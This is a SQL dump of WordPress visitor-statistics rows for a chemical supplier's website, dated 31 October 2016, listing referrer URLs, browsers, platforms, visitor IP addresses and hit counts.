INSERT INTO `wp_statistics_visitor` VALUES (14087, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14088, '2016-10-31', 'https://www.miller-stephenson.com', 'Xenu', 'Unknown', 'Unknown', '', '41.33.248.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14089, '2016-10-31', 'https://www.adsensecustomsearchads.com/', 'Edge', 'Windows', '14.14393', '', '104.37.143.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14090, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '65.158.70.186', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14091, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.97', '', '184.175.244.129', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14092, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '184.175.244.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14093, '2016-10-31', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '184.175.244.129', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14094, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '198.199.203.245', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14095, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiKy7j2qYXQAhUV8YMKHfyVBGQQFgglMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '198.175.154.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14096, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '141.211.99.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14097, '2016-10-31', 'https://www.google.ch', 'Firefox', 'Windows', '45.0', '', '10.210.112.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14098, '2016-10-31', 'https://www.google.com', 'MSIE', 'Windows', '6.0', '', '97.94.105.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14099, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '199.64.7.58', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14100, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiIws-rq4XQAhVKl1QKHQmtBi0QFghHMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.137132246,d.cGc', 'MSIE', 'Windows', '11.0', '', '151.163.2.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14101, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '5.44.115.206', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14102, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0ahUKEwiXkOnfrYXQAhXHxVQKHQU9AzQ4ChAWCEYwCA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fsuprion%2F&usg=AFQjCNFP6oaxjZe3KWqAwqSRWYI0HQDAAw&bvm=bv.137132246,d.cGw', 'MSIE', 'Windows', '11.0', '', '144.95.79.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14103, '2016-10-31', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '104.5.117.227', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14104, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjf7dz9rYXQAhXmi1QKHf1jCIMQFghCMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-1007f%2F&usg=AFQjCNF16KQyudb2Vw5kfWY2t87l1owfBg', 'MSIE', 'Windows', '11.0', '', '147.154.235.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14105, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '67.53.233.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14106, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.194.20.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14107, '2016-10-31', 'https://www.google.com.mx/', 'Chrome', 'Windows', '49.0.2623.112', '', '189.181.102.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14108, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '49.0.2623.87', '', '216.156.214.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14109, '2016-10-31', 'https://www.bing.com/search?q=Miller-Stephenson%20Chemical%20MS-122AD%20PTFE%20Release%20Agent%2FDry%20Lubricant%20%20sds&qs=n&form=QBRE&pq=miller-stephenson%20chemical%20ms-122ad%20ptfe%20release%20agent%2Fdry%20lubricant%20sds&sc=0-72&sp=-1&sk=&cvid=8F2B14932BFF4AFB9F211AD1EEDA282C', 'MSIE', 'Windows', '10.0', '', '143.62.14.112', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14110, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '35.0', '', '179.184.202.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14111, '2016-10-31', 'https://www.google.com', 'Firefox', 'Windows', '47.0', '', '73.11.61.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14112, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '70.60.56.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14113, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14114, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.195.119.161', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14115, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14116, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '207.236.191.201', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14117, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '78.188.171.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14118, '2016-10-31', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.176.85.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14119, '2016-10-31', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '138.163.106.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14120, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '46.0.2490.76', '', '66.87.125.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14121, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.141', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14122, '2016-10-31', 'https://mmr.mschem.com/miller/pdf/Heloxy.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '79.176.84.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14123, '2016-10-31', 'https://www.miller-stephenson.com/product/143ay/', 'Safari', 'iPhone', '10.0', '', '174.195.137.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14124, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.79.200.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14125, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14126, '2016-10-31', 'https://www.google.com.mx/', 'Chrome', 'Windows', '54.0.2840.71', '', '200.77.217.99', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14127, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14128, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14129, '2016-10-31', 'https://cse.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '69.128.200.37', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14130, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '70.183.80.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14131, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjazYaTv4XQAhWIOSYKHT0iAFEQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '199.29.132.5', '000', 42, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14132, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.105.60.255', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14133, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.175.73.170', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14134, '2016-10-31', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '75.73.219.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14135, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.97', '', '52.207.61.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14136, '2016-10-31', 'https://www.bing.com/search?q=miller+stephenson&qs=LS&pq=miller+step&sc=8-11&sp=1&cvid=1FA470DDD8224E20B86FD313D219EACB&FORM=QBLH&ghc=1&adlt=strict', 'MSIE', 'Windows', '11.0', '', '134.223.116.152', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14137, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '207.181.211.168', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14138, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14139, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14140, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&sqi=2&ved=0ahUKEwi_kKuMwoXQAhVHqFQKHXy2C1QQFgguMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.137132246,d.cGw', 'MSIE', 'Windows', '11.0', '', '158.184.198.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14141, '2016-10-31', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14142, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '128.115.190.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14143, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14144, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0ahUKEwju-4WGwYXQAhWBErwKHdL1Do0QFghzMAo&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Flubricants%2Ftribosys-lubricants%2Fpfpe-oils-greases%2F&usg=AFQjCNEACUulCHqsyJWMuzlBpxms8P3acw', 'MSIE', 'Windows', '11.0', '', '63.158.182.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14145, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.238.125.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14146, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.103.87.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14147, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '96.87.111.20', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14148, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '157.204.1.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14149, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.54.126.162', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14150, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.116.9.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14151, '2016-10-31', 'https://search.yahoo.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '96.229.223.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14152, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.46.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14153, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.245.7.33', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14154, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.52.98.190', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14155, '2016-10-31', 'https://www.google.com/url?url=https://www.miller-stephenson.com/product/krytox-fpg-028/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjl1Pa6xoXQAhVs5YMKHfRkBRkQFgg_MAA&usg=AFQjCNHNSZsQuUiIKsuxWqXRLEidgIoZhQ', 'MSIE', 'Windows', '9.0', '', '108.44.219.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14156, '2016-10-31', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '96.88.14.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14157, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '58.64.181.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14158, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjp6_WXyIXQAhVpy1QKHX8pBkoQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.cGw&cad=rjt', 'MSIE', 'Windows', '11.0', '', '192.5.58.223', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14159, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '37.187.171.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14160, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '64.71.32.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14161, '2016-10-31', 'https://www.miller-stephenson.com', 'YisouSpider', 'Unknown', 'Unknown', '', '42.156.137.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14162, '2016-10-31', 'https://www.google.ca/', 'Safari', 'iPad', '10.0', '', '67.193.197.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14163, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '68.52.64.65', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14164, '2016-10-31', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwj1uPaGzIXQAhXj24MKHbj0D6sQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '192.75.48.150', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14165, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '104.36.239.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14166, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '129.171.6.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14167, '2016-10-31', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Chrome', 'Windows', '53.0.2785.116', '', '31.14.16.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14168, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '172.113.246.214', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14169, '2016-10-31', 'https://search.yahoo.com/', 'Firefox', 'Windows', '49.0', '', '128.244.38.5', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14170, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'iPhone', '54.0.2840.66', '', '75.84.178.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14171, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.202.28.131', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14172, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.50.62.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14173, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '44.0', '', '71.50.62.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14174, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2358.49', '', '23.106.27.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14175, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '204.27.197.5', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14176, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '162.243.126.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14177, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14178, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epikure-curing-agents/epikure-w-composites/', 'Safari', 'Macintosh', '5.1.9', '', '107.185.1.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14179, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/medical-chemicals', 'Firefox', 'Windows', '36.0', '', '174.129.138.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14180, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '144.76.236.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14181, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '54.234.184.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14182, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '165.155.192.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14183, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '183.14.18.0', '000', 92, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14184, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '161.69.31.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14185, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.161.129.205', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14186, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '207.243.51.42', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14187, '2016-10-31', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '24.106.209.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14188, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwj5_J_S14XQAhVEYyYKHZVqBwYQFghbMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-207%2F&usg=AFQjCNG9Q8oiwU0nrjZTiDSbjwCgJYJwNA&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '167.115.115.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14189, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.241.192.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14190, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '68.95.180.145', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14191, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjgucWa2YXQAhWqzIMKHTozAGgQFgg4MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w', 'MSIE', 'Windows', '11.0', '', '38.121.52.36', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14192, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '208.46.106.5', '000', 59, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14193, '2016-10-31', 'https://mschem.com/blog/', 'Chrome', 'Windows', '31.0.1650.57', '', '91.210.146.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14194, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '121.34.90.240', '000', 47, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14195, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14196, '2016-10-31', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.50', '', '54.208.28.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14197, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '168.215.163.10', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14198, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14199, '2016-10-31', 'https://www.miller-stephenson.com/product/conformal-coating-stripper/', 'Firefox', 'Windows', '33.0', '', '98.109.101.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14200, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.97', '', '165.231.101.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14201, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '165.231.101.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14202, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14203, '2016-10-31', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi4kv-p3oXQAhVCA7wKHcQrBJUYABAA&sig=AOD64_0wtHeHP7HOTN5UhbtXS1v25HSFLg&rct=j&q=&ved=0ahUKEwjY7_ep3oXQAhVqhlQKHds5DGwQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '148.114.242.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14204, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '106.120.161.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14205, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14206, '2016-10-31', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.90.3.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14207, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '97.77.39.130', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14208, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.106.148.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14209, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.127.83.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14210, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.97', '', '165.231.101.127', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14211, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '165.231.101.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14212, '2016-10-31', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj10oHj5IXQAhWFCSwKHQfYCTcQFghRMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-224%2F&usg=AFQjCNHubpWrAXrRrfzBGisjX94JmzUHTQ', 'MSIE', 'Windows', '11.0', '', '134.163.57.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14213, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.127.15.142', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14214, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.152.238.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14215, '2016-10-31', 'https://downloadkakaotalk.com/', 'MSIE', 'Windows', '6.0', '', '5.248.253.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14216, '2016-10-31', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwim0J2a6YXQAhVj0oMKHS3tDHwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fcontact-re-nu%2F&usg=AFQjCNGupBAMUOzLVuMUttyDhbks3RNbvw&sig2=A-IwnE6pGvDGq7y7IMCV_A&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '205.237.44.59', '000', 2, 0); 
